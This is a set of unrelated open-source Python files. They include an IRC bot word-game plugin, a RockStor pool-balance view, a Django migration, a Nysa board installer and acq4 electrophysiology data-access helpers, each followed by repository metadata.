#commonwords = ['SUCH', 'THAT', 'THAN', 'WHICH', 'FROM', 'WITH', 'OTHER', 'SOME', 'THEIR', 'WHOSE', 'PASS', 'WHERE', 'BEING', 'USED', 'BEEN']
words = bz2.BZ2File("wordlist/wiktionary.txt.bz2","r")
index = None
for line in words:
line = line.strip()
if line[0]=='?':
index = line[1:].upper()
if len(re.findall('[^A-Z ]',index))>0:
index=None
elif line[0]=="!":
if index:
dico[index]=line[1:]
def uniq(seq):
"eliminates duplicates from a list"
if len(seq)<2:
return seq
rest = uniq(seq[1:])
if seq[0] in rest:
return rest
else:
return [seq[0]]+rest
def setup(self):
try:
yamldata = open("taboo.yaml",'r')
self.taboo = yaml.load(yamldata.read())
except:
self.taboo={}
self.taboo['run']=False
self.taboo['scores']={}
try:
yamldata = open("defind.yaml",'r')
self.define = yaml.load(yamldata.read())
except:
self.define={}
self.define['run']=False
self.define['status']=None
self.define['scores']={}
self.define['word']=None
self.define['defs']=[]
self.define['selected']={}
def initgame(phenny, input):
phenny.taboo['clue']=False
phenny.taboo['taboo']=False
phenny.taboo['run']=True
phenny.taboo['lines']=0
phenny.taboo['time']=time.time()
phenny.taboo['round']={}
playtime = 301
def definescores(phenny, input):
total = phenny.define['scores']
msg = 'Total defind scores: '
ordered = sorted(total.items(), key=itemgetter(1), reverse = True)
for entry in ordered[:10]:
msg += entry[0]+": "+str(entry[1])+"; "
phenny.say(msg)
definescores.commands = ["dtop", "dscores", "dhof"]
definescores.thread = True
definescores.priority = 'low'
def defind(phenny, input):
if phenny.define['run']:
return
phenny.define['run'] = True
phenny.define['status'] = DEFINE_NONE
phenny.define['defs'] = []
phenny.define['selected']={}
while True:
word = random.choice(dico.keys())
if len(word.split(" "))<3 and dico[word].strip():
break
phenny.define['word']=word
phenny.say("Do you all know what %s means? Quick, send me your .def[inition] via private message!" % word)
phenny.define['defs'] = [[dico[word], "Wiktionary"]]
phenny.define['status'] = DEFINE_DEFINE
time.sleep(120)
defs = phenny.define['defs'][:]
n=1
ordered = []
phenny.say("Let's see, what could %s mean?." % word)
while len(defs)>0:
df = random.choice(defs)
defs.remove(df)
ordered.append([df[0], df[1], n])
phenny.say("%i: %s" % (n,df[0]))
n+=1
phenny.define['defs']=ordered
phenny.define['status'] = DEFINE_SELECT
phenny.say("Now, .select the definition which you would expect to be the official one.")
time.sleep(60)
phenny.define['status'] = DEFINE_NONE
phenny.say("Very well, let's see who has tricked whom today.")
followers = {}
selection = phenny.define['selected']
for fool in selection.keys():
id = selection[fool]
if id in followers:
followers[id].append(fool)
else:
followers[id]=[fool]
for df in ordered:
msg = "%s proposed: '%s'" % (df[1], df[0])
fools = followers.get(df[2],[])
if len(fools):
if len(fools)==1:
msg += " - %s was convinced." % fools[0]
else:
msg += " - %i were convinced." % len(fools)
if df[1]!="Wiktionary":
phenny.define['scores'][df[1]]=phenny.define['scores'].get(df[1],0) + len(fools)*3
else:
for fool in fools:
phenny.define['scores'][fool]=phenny.define['scores'].get(fool,0) + 1
phenny.say(msg)
phenny.define['run'] = False
yamldump = open("defind.yaml",'w') #save teh permanent scores
yamldump.write(yaml.dump(phenny.define))
yamldump.close()
definescores(phenny, input)
defind.commands = ["defind"]
defind.thread = True
defind.priority = 'low'
def definedef(phenny, input):
if not phenny.define['status']==DEFINE_DEFINE:
return
defs = phenny.define['defs']
for df in defs:
if input.nick==df[1]:
#phenny.say("You have already submitted a definition, %s" % input.nick)
#return
defs.remove(df)
break
df = input[input.find(" ")+1:]
defs.append([df, input.nick])
phenny.say("Thank you, %s" % input.nick)
definedef.commands = ["def","define","definition"]
definedef.thread = False
definedef.priority = 'low'
def selectdef(phenny, input):
if not phenny.define['status']==DEFINE_SELECT:
return
#if input.nick in phenny.define['selected']:
# phenny.say("No changing minds, %s." % input.nick)
# return
try:
par = input[input.find(" ")+1:]
pos = int(par)
df = phenny.define['defs'][pos-1] #throws an exception if out of bounds
if df[1]==input.nick:
#intentionally no message provided
return
phenny.define['selected'][input.nick]=pos
phenny.say("A wise choice, %s" % input.nick)
except:
phenny.say("That's nothing you could choose from, %s." % input.nick)
return
selectdef.commands = ["select"]
selectdef.thread = True
selectdef.priority = 'low'
def tabooify(string):
return re.sub('[^A-Z ]',' ',string.strip().upper())
def taboo(phenny, input):
if phenny.taboo['run']:
return
initgame(phenny, input)
while True:
if not phenny.taboo['clue']:
while True:
clue = random.choice(dico.keys())
boos = uniq(sorted([x for x in tabooify(dico[clue]).split() if len(x)>3]))
for com in commonwords:
if com in boos:
boos.remove(com)
phenny.taboo['clue']=clue
phenny.taboo['boos']=boos
if len(boos)>2:
break
phenny.taboo['player']=input.nick
phenny.bot.msg(input.nick,"describe "+clue+" without using any of "+reduce(lambda x,y:x+", "+y, boos)) #private message to originator
tdiff = playtime - (time.time()-phenny.taboo['time'])
tmin = int(floor(tdiff/60))
tstr = str(tmin) + " minutes " + str(int(floor(tdiff-tmin*60))) + " seconds"
phenny.say("Taboo: Off we go! "+tstr+" and counting..")
else:
time.sleep(1)
if time.time() > phenny.taboo['time'] + playtime:
phenny.say("Time out.")
break
if phenny.taboo['taboo']==True: #A taboo word was said
break
score = phenny.taboo['round']
if len(score)>0:
msg = 'Taboo results: '
for player in score:
scr = score[player]
phenny.taboo['scores'][player]=phenny.taboo['scores'].get(player,0)+scr
msg += player+": "+str(scr)+"; "
phenny.taboo['run'] = False
yamldump = open("taboo.yaml",'w') #save teh permanent scores
yamldump.write(yaml.dump(phenny.taboo))
yamldump.close()
phenny.say(msg)
phenny.taboo['run'] = False
taboo.commands=["taboo"]
taboo.thread=True
taboo.priority='low'
def tabooanswer(phenny, input):
if phenny.taboo['run']==False:
return
if phenny.taboo['clue']==False:
return
answer = re.sub('[^A-Z]','',input.strip().upper())
nospaceclue = re.sub(' ','',phenny.taboo['clue'])
if input.nick == phenny.taboo['player']:
phenny.taboo['lines']=phenny.taboo.get('lines',0)+1 #count the clues needed
for boo in phenny.taboo['boos']:
if boo in answer:
phenny.say("TABOO!")
phenny.taboo['taboo']=True
return #to avoid double mentions
if nospaceclue in answer:
phenny.say("DOUBLE BOO!")
phenny.taboo['taboo']=True
phenny.taboo['round'][input.nick]=0
else:
if answer == nospaceclue:
pscore = phenny.taboo['round'].get(phenny.taboo['player'],0)+1
ascore = phenny.taboo['round'].get(input.nick,0)+1
phenny.say(input.nick+": "+phenny.taboo['clue']+" is correct! You score "+str(ascore)+", "+phenny.taboo['player']+" scores "+str(pscore)+".")
phenny.taboo['round'][phenny.taboo['player']]=pscore
phenny.taboo['round'][input.nick]=ascore
phenny.taboo['clue']=False #ok for next word
tabooanswer.rule=".*?"
tabooanswer.thread=True
tabooanswer.priority='high'
def taboopass(phenny, input):
if phenny.taboo['run']:
if input.nick == phenny.taboo['player']:
phenny.taboo['clue']=False
phenny.say("Passed.")
taboopass.commands=["pass"]
taboopass.priority='low'
def thof(phenny,input):
total = phenny.taboo['scores']
msg = 'Total \'taboo\' scores: '
ordered = sorted(total.items(), key=itemgetter(1), reverse = True)
for entry in ordered[:10]:
msg += entry[0]+": "+str(entry[1])+"; "
phenny.say(msg)
thof.commands=["thof","ttop","taboohof","tabootop"]
thof.priority='low'
|
mit
| -4,444,352,367,475,145,000 | 30.049645 | 147 | 0.6254 | false |
priyaganti/rockstor-core
|
src/rockstor/storageadmin/views/pool_balance.py
|
1
|
4945
|
"""
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from rest_framework.response import Response
from django.db import transaction
from django_ztask.models import Task
from storageadmin.util import handle_exception
from storageadmin.serializers import PoolBalanceSerializer
from storageadmin.models import (Pool, PoolBalance)
import rest_framework_custom as rfc
from fs.btrfs import balance_status
from pool import PoolMixin
import logging
logger = logging.getLogger(__name__)
class PoolBalanceView(PoolMixin, rfc.GenericView):
serializer_class = PoolBalanceSerializer
@staticmethod
def _validate_pool(pname, request):
try:
return Pool.objects.get(name=pname)
except:
e_msg = ('Pool(%s) does not exist' % pname)
handle_exception(Exception(e_msg), request)
def get_queryset(self, *args, **kwargs):
with self._handle_exception(self.request):
pool = self._validate_pool(self.kwargs['pname'], self.request)
self._balance_status(pool)
return PoolBalance.objects.filter(pool=pool).order_by('-id')
@staticmethod
@transaction.atomic
def _balance_status(pool):
try:
# acquire a handle on the last pool balance status db entry
ps = PoolBalance.objects.filter(pool=pool).order_by('-id')[0]
except:
# return empty handed if we have no 'last entry' to update
return Response()
# Check if we have a running task which matches our last pool status
# tid
if (Task.objects.filter(uuid=ps.tid).exists()):
to = Task.objects.get(uuid=ps.tid)
if (to.failed is not None):
ps.status = 'failed'
ps.message = to.last_exception
ps.end_time = to.failed
ps.save()
to.delete()
return ps
# Get the current status of balance on this pool, irrespective of
# a running balance task, ie command line intervention.
cur_status = balance_status(pool)
previous_status = ps.status
# TODO: future "Balance Cancel" button should call us to have these
# TODO: values updated in the db table ready for display later.
if previous_status == 'cancelling' \
and cur_status['status'] == 'finished':
# override current status as 'cancelled'
cur_status['status'] = 'cancelled'
cur_status['message'] = \
'cancelled at %s%% complete' % ps.percent_done
# and retain prior percent finished value
cur_status['percent_done'] = ps.percent_done
if previous_status != 'finished' and previous_status != 'cancelled':
# update the last pool balance status with current status info.
PoolBalance.objects.filter(id=ps.id).update(**cur_status)
return ps
@transaction.atomic
def post(self, request, pname, command=None):
pool = self._validate_pool(pname, request)
if (command is not None and command != 'status'):
e_msg = ('Unknown balance command: %s' % command)
handle_exception(Exception(e_msg), request)
with self._handle_exception(request):
ps = self._balance_status(pool)
if (command == 'status'):
return Response(PoolBalanceSerializer(ps).data)
force = request.data.get('force', False)
if ((PoolBalance.objects.filter(pool=pool,
status__regex=r'(started|running)')
.exists())):
if (force):
p = PoolBalance.objects.filter(
pool=pool,
status__regex=r'(started|running)').order_by('-id')[0]
p.status = 'terminated'
p.save()
else:
e_msg = ('A Balance process is already running for '
'pool(%s).' % pname)
handle_exception(Exception(e_msg), request)
tid = self._balance_start(pool, force=force)
ps = PoolBalance(pool=pool, tid=tid)
ps.save()
return Response(PoolBalanceSerializer(ps).data)
|
gpl-3.0
| 4,099,229,094,232,960,000 | 40.90678 | 79 | 0.611325 | false |
xzzy/statdev
|
approvals/migrations/0001_initial.py
|
1
|
3974
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-08-06 02:49
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0023_communicationslogentry_log_type'),
('applications', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Approval',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_type', models.IntegerField(choices=[(1, 'Permit'), (2, 'Licence/permit'), (3, 'Part 5'), (4, 'Emergency works'), (5, 'Part 5 - Amendment Request'), (6, 'Part 5 - Amendment Application'), (7, 'Test - Application'), (8, 'Amend Permit'), (9, 'Amend Licence'), (10, 'Renew Permit'), (11, 'Renew Licence')])),
('title', models.CharField(max_length=254)),
('issue_date', models.DateField(auto_now_add=True, null=True)),
('start_date', models.DateField(blank=True, null=True)),
('expiry_date', models.DateField(blank=True, null=True)),
('status', models.IntegerField(choices=[(1, 'Current'), (2, 'Expired'), (3, 'Cancelled'), (4, 'Surrendered'), (5, 'Suspended'), (6, 'Reinstate')])),
('suspend_from_date', models.DateField(blank=True, null=True)),
('suspend_to_date', models.DateField(blank=True, null=True)),
('reinstate_date', models.DateField(blank=True, null=True)),
('cancellation_date', models.DateField(blank=True, null=True)),
('surrender_date', models.DateField(blank=True, null=True)),
('details', models.TextField(blank=True, null=True)),
('ammendment_application', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='ammendment_application', to='applications.Application')),
('applicant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='applicant_holder', to=settings.AUTH_USER_MODEL)),
('application', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='application', to='applications.Application')),
('approval_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approval_document', to='applications.Record')),
('organisation', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='accounts.Organisation')),
],
),
migrations.CreateModel(
name='CommunicationApproval',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comms_to', models.CharField(blank=True, max_length=256, null=True)),
('comms_from', models.CharField(blank=True, max_length=256, null=True)),
('subject', models.CharField(blank=True, max_length=256, null=True)),
('comms_type', models.IntegerField(choices=[(0, 'None'), (1, 'Phone'), (2, 'Email'), (3, 'Mail'), (4, 'System')], default=0)),
('details', models.TextField(blank=True, null=True)),
('state', models.IntegerField(blank=True, null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('approval', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='approvals.Approval')),
('records', models.ManyToManyField(blank=True, related_name='communication_approvals_docs', to='applications.Record')),
],
),
]
|
apache-2.0
| 4,364,313,000,562,383,000 | 66.355932 | 326 | 0.617011 | false |
CospanDesign/nysa-demo-platform
|
local_install.py
|
1
|
3208
|
#! /usr/bin/python
# Copyright (c) 2015 Dave McCoy (dave.mccoy@cospandesign.com)
#
# Nysa is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# Nysa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Nysa; If not, see <http://www.gnu.org/licenses/>.
import site
import os
import sys
import argparse
import json
import datetime
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
BOARD_NAME = "demo"
PLATFORM_PATH = os.path.abspath(os.path.dirname(__file__))
CONFIG_PATH = os.path.join(PLATFORM_PATH, BOARD_NAME, "board", "config.json")
SCRIPT_NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % SCRIPT_NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
def main(argv):
#Parse out the commandline arguments
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=DESCRIPTION,
epilog=EPILOG
)
parser.add_argument("--uninstall",
action="store_true",
help="Uninstall Board Package")
parser.add_argument("-d", "--debug",
action="store_true",
help="Enable Debug Messages")
args = parser.parse_args()
print "Running Script: %s" % SCRIPT_NAME
#Get the configuration dictionary from the ./board_name/board/config.json
f = open(CONFIG_PATH, "r")
config_dict = json.load(f)
f.close()
name = config_dict["board_name"].lower()
try:
import nysa
except ImportError as e:
print "Nysa Not Installed! install Nysa:"
print "How to install Nysa:"
print "\tsudo apt-get install git verilog gtkwave"
print "\tsudo -H pip install git+https://github.com/CospanDesign/nysa"
print "\tnysa init"
print "\tnysa install-examples all"
print ""
print "Then run this script again"
sys.exit(1)
if args.uninstall:
uninstall_board(name, args.debug)
else:
install_board(name, PLATFORM_PATH, setup_platform = True, debug = args.debug)
def install_board(name, path, setup_platform, debug):
from nysa.ibuilder.lib import utils
from nysa.common.status import Status
status = Status()
if debug:
status.set_level("Verbose")
utils.install_local_board_package(name, path, setup_platform, status)
def uninstall_board(name, debug):
from nysa.ibuilder.lib import utils
from nysa.common.status import Status
status = Status()
if debug:
status.set_level("Verbose")
utils.uninstall_local_board_package(name, status)
if __name__ == "__main__":
main(sys.argv)
|
mit
| -4,583,748,255,007,478,300 | 28.431193 | 85 | 0.645262 | false |
amarin/oupyc
|
oupyc/application/__init__.py
|
1
|
6562
|
# -*- coding: utf-8 -*-
from threading import RLock
from oupyc.application.condition import ConditionGenerator
from oupyc.application.generator import GeneratorThread
from oupyc.application.processor import ProcessorThread
from oupyc.application.router import RouterThread
from oupyc.application.transformer import TransformerThread
from oupyc.queues import FixedSizeQueue
__author__ = 'AMarin'
# -*- coding: utf-8 -*-
import threading
import time
import logging
from abc import ABCMeta, abstractmethod
from oupyc.checks import require_kwarg_type
_l = logging.getLogger(__name__)
_l.setLevel(logging.INFO)
debug, info, warning, error, critical = _l.debug, _l.info, _l.warning, _l.error, _l.critical
GENERATOR="generator"
ROUTER="router",
TRANSFORMER="transformer"
PROCESSOR="processor"
CONDITION="condition"
KNOWN_THREADS = {
GENERATOR: GeneratorThread,
ROUTER: RouterThread,
TRANSFORMER: TransformerThread,
PROCESSOR: ProcessorThread,
CONDITION: ConditionGenerator
}
class ThreadSearchError(Exception):
pass
'''
self._prepare_threads()
def _prepare_threads(self):
if hasattr(self, "_thread_classes") and len(getattr(self, "_thread_classes")):
info("Initiating %s threads", len(self._thread_classes))
for thread_class in self._thread_classes:
debug("Make %s thread", thread_class.description)
thread_instance = thread_class(exit_event=self._exit_event)
self._threads.append(thread_instance)
'''
class ThreadedApplication(object):
def __init__(self, threads, *args, **kwargs):
super(ThreadedApplication, self).__init__()
self._threads = []
self._mutex = RLock()
with self._mutex:
for th in threads:
self._threads.append(th)
self._exit_event = threading.Event()
def add_thread(self, th):
info("Adding thread %s" % th)
th._exit_event = self._exit_event
self._threads.append(th)
def add_threads(self, *threads):
map(lambda th: self.add_thread(th), threads)
def make_thread(self, thread_type, func):
if thread_type in KNOWN_THREADS:
thread_class = KNOWN_THREADS[thread_type]
return thread_class.make(func)
else:
raise ThreadSearchError("Unknown thread type %s, choose one of %s" % (thread_type, KNOWN_THREADS))
def make_gtp_chain(self, *callables):
current_queue = None
max_index = len(callables)-1
with self._mutex:
for func in callables:
idx = callables.index(func)
item = None
if 0 == idx:
# first thread is item generator
item = self.make_thread(GENERATOR, callables[idx])
item.add_queue("result", FixedSizeQueue(size=1))
elif idx < max_index:
# internal threads
item = self.make_thread(TRANSFORMER, callables[idx])
item.set_input(self._threads[-1])
item.add_queue("result", FixedSizeQueue(size=1))
elif idx == max_index:
# last thread is item processor
item = self.make_thread(PROCESSOR, callables[idx])
item.set_input(self._threads[-1])
self.add_thread(item)
def main(self):
""" Main execution process """
info("Starting %s threads", len(self._threads))
for th in self._threads:
if hasattr(th, "get_all_queues"):
for queue in th.get_all_queues():
print("%s %s" % (th.getName(), queue))
for th in self._threads:
debug("%s starting" % th.description)
th.start()
info("%s started", th.description)
info("All internal threads started")
while not self._exit_event.isSet():
pass
def exit_gracefully(self):
""" Gracefull stop """
info("Stopping all threads")
for th in self._threads[::-1]:
info("Waiting %s", th.description)
debug("thread %s[%s]", type(th), th)
th.join(10)
def run(self):
info("Run %s", self.__class__.__name__)
try:
self.main()
except KeyboardInterrupt:
warning("Processing CTRL-C")
self._exit_event.set()
except Exception as exc:
critical(exc)
finally:
info("Exit gracefully")
self.exit_gracefully()
for th in threading._enumerate():
error("Thread %s still active", th)
if not 'MainThread'==th.getName():
th.join(1)
info("Done")
def get_threads_by_class(self, thread_cls):
return filter(lambda x: isinstance(x, thread_cls), self._threads)
def get_threads_by_name(self, thread_name):
return filter(lambda x: thread_name==x.getName(), self._threads)
def get_threads(self, cls_or_name):
""" Get threads filtered by name or class """
return isinstance(cls_or_name, type) \
and self.get_threads_by_class(cls_or_name) \
or self.get_threads_by_name(cls_or_name)
def get_thread(self, cls_or_name):
""" Get single thread with requested name or class. Raises ThreadSearchError if found multiple or nothing"""
_filtered = self.get_threads(cls_or_name)
if 1>len(_filtered):
raise ThreadSearchError("No threads found with class or name %s" % (cls_or_name))
elif 1<len(_filtered):
raise ThreadSearchError("Multiple threads found with class or name %s." % (cls_or_name))
else:
return _filtered[0]
class ApplicationWithStatistics(ThreadedApplication):
__metaclass__ = ABCMeta
def __init__(self, threads, *args, **kwargs):
super(ApplicationWithStatistics, self).__init__(threads)
# init statistics subsystem
stat_queue_size = require_kwarg_type('statistics_queue_size', int, kwargs)
import oupyc.inthreads.statistics
stat_thread, stat_aggregate_thread = oupyc.inthreads.statistics.start(
self._exit_event,
stat_queue_size,
stat_queue_size,
lambda x: self.process_stat_record(x)
)
self._threads.insert(0, stat_thread)
self._threads.insert(0, stat_aggregate_thread)
@abstractmethod
def process_stat_record(self, record):
pass
|
gpl-2.0
| -5,474,336,323,609,977,000 | 32.309645 | 116 | 0.594636 | false |
tropp/acq4
|
acq4/analysis/dataModels/PatchEPhys/PatchEPhys.py
|
1
|
32235
|
# -*- coding: utf-8 -*-
import acq4.util.DataManager as DataManager
import acq4.util.SequenceRunner as SequenceRunner
from collections import OrderedDict
import functools
from acq4.util.metaarray import *
import numpy as np
protocolNames = {
'IV Curve': ('cciv.*', 'vciv.*'),
'Photostim Scan': (),
'Photostim Power Series': (),
}
# note: make sure the names, if single, are followed by ',', so as to enforce elements of tuple
deviceNames = {
'Clamp': ('Clamp1', 'Clamp2', 'AxoPatch200', 'AxoProbe', 'MultiClamp1', 'MultiClamp2'),
'Camera': ('Camera',),
'Laser': ('Laser-UV', 'Laser-Blue', 'Laser-2P'),
'LED-Blue': ('LED-Blue',),
}
# current and voltage clamp modes that are know to us
ic_modes = ['IC', 'CC', 'IClamp', 'ic', 'I-Clamp Fast', 'I-Clamp Slow']
vc_modes = ['VC', 'VClamp', 'vc'] # list of VC modes
"""Function library for formalizing the raw data structures used in analysis.
This provides a layer of abstraction between the raw data and the analysis routines.
Should allow simple questions like
Were any scan protocols run under this cell?
Is this a sequence protocol or a single?
Give me a meta-array linking all of the data in a sequence (will have to use hdf5 for this?)
Give me a meta-array of all images from 'Camera' in a sequence (will have to use hdf5 for this?)
Give me the clamp device for this protocol run
tell me the temperature of this run
tell me the holding potential for this clamp data
possibly DB integration?
When did the laser stimulation occur, for how long, and at what power level?
Notes:
Should be able to easily switch to a different data model
"""
def knownClampNames():
return deviceNames['Clamp']
def isSequence(dh):
"""Return true if dh is a directory handle for a protocol sequence."""
return dirType(dh) == 'ProtocolSequence'
#if 'sequenceParams' in dh.info():
#return True
#else:
#return False
def dirType(dh, allowRecurse=True):
"""
Return a string representing the type of data stored in a directory.
Usually, this is provided in the meta-info for the directory, but in a few
cases (old data formats) we need to do a little more probing.
Returns None if the type cannot be determined.
"""
info = dh.info()
type = info.get('dirType', None)
if type is None:
if '__object_type__' in info:
type = info['__object_type__']
elif dh.name()[-5:] == 'Patch':
type = 'Patch'
elif 'protocol' in info:
if 'sequenceParams' in info:
type = 'ProtocolSequence'
else:
type = 'Protocol' ## an individual protocol run, NOT a single run from within a sequence
else:
try:
assert allowRecurse
parent = dh.parent()
if dirType(parent, allowRecurse=False) == 'ProtocolSequence':
type = 'Protocol'
#else:
#raise Exception()
except:
pass
#raise Exception("Can't determine type for dir %s" % dh.name())
return type
def listSequenceParams(dh):
"""Given a directory handle for a protocol sequence, return the dict of sequence parameters"""
try:
return dh.info()['sequenceParams']
except KeyError:
raise Exception("Directory '%s' does not appear to be a protocol sequence." % dh.name())
## what's this for?
#def listWaveGenerator(dh):
# try:
# return dh.info()['waveGeneratorWidget']
# except KeyError:
# raise Exception("Directory '%s' does not appear to be have a wave Generator." % dh.name())
def buildSequenceArray(*args, **kargs):
"""Builds a MetaArray of data compiled across a sequence.
Arguments:
dh: directory handle for the protocol sequence
func: a function (optional) that returns an array or scalar, given a protocol dir handle.
If func is None, return an object array containing the DirHandles (forces join=False)
join: If True (default), attempt to join all results into a single array. This assumes that
func returns arrays of equal shape for every point in the parameter space.
If False, just return an object array pointing to individual results.
truncate: If join=True and some elements differ in shape, truncate to the smallest shape
fill: If join=True, pre-fill the empty array with this value. Any points in the
parameter space with no data will be left with this value.
Example: Return an array of all primary-channel clamp recordings across a sequence
buildSequenceArray(seqDir, lambda protoDir: getClampFile(protoDir).read()['primary'])"""
for i,m in buildSequenceArrayIter(*args, **kargs):
if m is None:
return i
def buildSequenceArrayIter(dh, func=None, join=True, truncate=False, fill=None):
"""Iterator for buildSequenceArray that yields progress updates."""
if func is None:
func = lambda dh: dh
join = False
params = listSequenceParams(dh)
#inds = OrderedDict([(k, range(len(v))) for k,v in params.iteritems()])
#def runFunc(dh, func, params):
#name = '_'.join(['%03d'%n for n in params.values()])
#fh = dh[name]
#return func(fh)
#data = SequenceRunner.runSequence(functools.partial(runFunc, dh, func), inds, inds.keys())
subDirs = dh.subDirs()
if len(subDirs) == 0:
yield None, None
## set up meta-info for sequence axes
seqShape = tuple([len(p) for p in params.itervalues()])
info = [[] for i in range(len(seqShape))]
i = 0
for k,v in params.iteritems():
info[i] = {'name': k, 'values': np.array(v)}
i += 1
## get a data sample
first = func(dh[subDirs[0]])
## build empty MetaArray
if join:
shape = seqShape + first.shape
if isinstance(first, MetaArray):
info = info + first._info
else:
info = info + [[] for i in range(first.ndim+1)]
data = MetaArray(np.empty(shape, first.dtype), info=info)
if fill is not None:
data[:] = fill
else:
shape = seqShape
info = info + []
data = MetaArray(np.empty(shape, object), info=info)
## fill data
i = 0
if join and truncate:
minShape = first.shape
for name in subDirs:
subd = dh[name]
d = func(subd)
minShape = [min(d.shape[j], minShape[j]) for j in range(d.ndim)]
dhInfo = subd.info()
ind = []
for k in params:
ind.append(dhInfo[k])
sl = [slice(0,m) for m in minShape]
ind += sl
data[tuple(ind)] = d[sl]
i += 1
yield i, len(subDirs)
sl = [slice(None)] * len(seqShape)
sl += [slice(0,m) for m in minShape]
data = data[sl]
else:
for name in subDirs:
subd = dh[name]
d = func(subd)
dhInfo = subd.info()
ind = []
for k in params:
ind.append(dhInfo[k])
data[tuple(ind)] = d
i += 1
yield i, len(subDirs)
yield data, None
def getParent(child, parentType):
"""Return the (grand)parent of child that matches parentType"""
if dirType(child) == parentType:
return child
parent = child.parent()
if parent is child:
return None
return getParent(parent, parentType)
def getClampFile(protoDH):
"""
Given a protocol directory handle, return the clamp file handle within.
If there are multiple clamps, only the first one encountered in deviceNames is returned.
Return None if no clamps are found.
"""
if protoDH.name()[-8:] == 'DS_Store': ## OS X filesystem puts .DS_Store files in all directories
return None
files = protoDH.ls()
for n in deviceNames['Clamp']:
if n in files:
return protoDH[n]
if n+'.ma' in files:
return protoDH[n+'.ma']
#print 'getClampFile: did not find protocol for clamp: ', files
#print 'valid devices: ', deviceNames['Clamp']
return None
def isClampFile(fh):
if fh.shortName() not in deviceNames['Clamp'] and fh.shortName()[:-3] not in deviceNames['Clamp']:
return False
else:
return True
def getClampCommand(data, generateEmpty=True):
"""Returns the command data from a clamp MetaArray.
If there was no command specified, the function will return all zeros if generateEmpty=True (default)."""
if data.hasColumn('Channel', 'Command'):
return data['Channel': 'Command']
elif data.hasColumn('Channel', 'command'):
return data['Channel': 'command']
else:
if generateEmpty:
tVals = data.xvals('Time')
mode = getClampMode(data)
if 'v' in mode.lower():
units = 'V'
else:
units = 'A'
return MetaArray(np.zeros(tVals.shape), info=[{'name': 'Time', 'values': tVals, 'units': 's'}, {'units': units}])
return None
def getClampPrimary(data):
"""Return primary channel from """
if data.hasColumn('Channel', 'primary'):
return data['Channel': 'primary']
else:
return data['Channel': 'scaled']
def getClampMode(data_handle, dir_handle=None):
"""Given a clamp file handle or MetaArray, return the recording mode."""
if (hasattr(data_handle, 'implements') and data_handle.implements('MetaArray')):
data = data_handle
elif isClampFile(data_handle):
data = data_handle.read(readAllData=False)
else:
raise Exception('%s not a clamp file.' % data)
# if isClampFile(data_handle):
# data = data_handle.read(readAllData=False)
# else:
# data = data_handle
info = data._info[-1]
if 'ClampState' in info:
return info['ClampState']['mode']
else:
try:
mode = info['mode'] # if the mode is in the info (sometimes), return that
return mode
except KeyError:
raise KeyError('PatchEPhys, getClampMode: Cannot determine clamp mode for this data')
# if dir_handle is not None:
# devs = dir_handle.info()['devices'].keys() # get devices in parent directory
# for dev in devs: # for all the devices
# if dev in deviceNames['Clamp']: # are any clamps?
# # print 'device / keys: ', dev, dir_handle.info()['devices'][dev].keys()
# #print 'mode: ', dir_handle.info()['devices'][dev]['mode']
# return dir_handle.info()['devices'][dev]['mode']
# else:
# return 'vc' # None kludge to handle simulations, which don't seem to fully fill the structures.
def getClampHoldingLevel(data_handle):
"""Given a clamp file handle, return the holding level (voltage for VC, current for IC).
TODO: This function should add in the amplifier's internal holding value, if available?
"""
if not isClampFile(data_handle):
raise Exception('%s not a clamp file.' % data_handle.shortName())
data = data_handle.read(readAllData=False)
info = data._info[-1]
p1 = data_handle.parent()
p2 = p1.parent()
if isSequence(p2):
sinfo = p2.info()
else:
sinfo = p1.info()
## There are a few places we could find the holding value, depending on how old the data is
if 'ClampState' in info and 'holding' in info['ClampState']:
return info['ClampState']['holding']
elif 'DAQ' in info and 'command' in info['DAQ'] and 'holding' in info['DAQ']['command']:
return info['DAQ']['command']['holding']
else:
try:
if data_handle.shortName()[-3:] == '.ma':
name = data_handle.shortName()[:-3]
else:
name = data_handle.shortName()
holding = float(sinfo['devices'][name]['holdingSpin']) ## in volts
return holding
except KeyError:
return None
def getClampState(data_handle):
"""
Return the full clamp state
"""
if not isClampFile(data_handle):
raise Exception('%s not a clamp file.' % data_handle.shortName())
data = data_handle.read(readAllData=False)
info = data._info[-1]
if 'ClampState' in info.keys():
return info['ClampState']
else:
return None
def getWCCompSettings(data_handle):
"""
return the compensation settings, if available
Settings are returned as a group in a dictionary
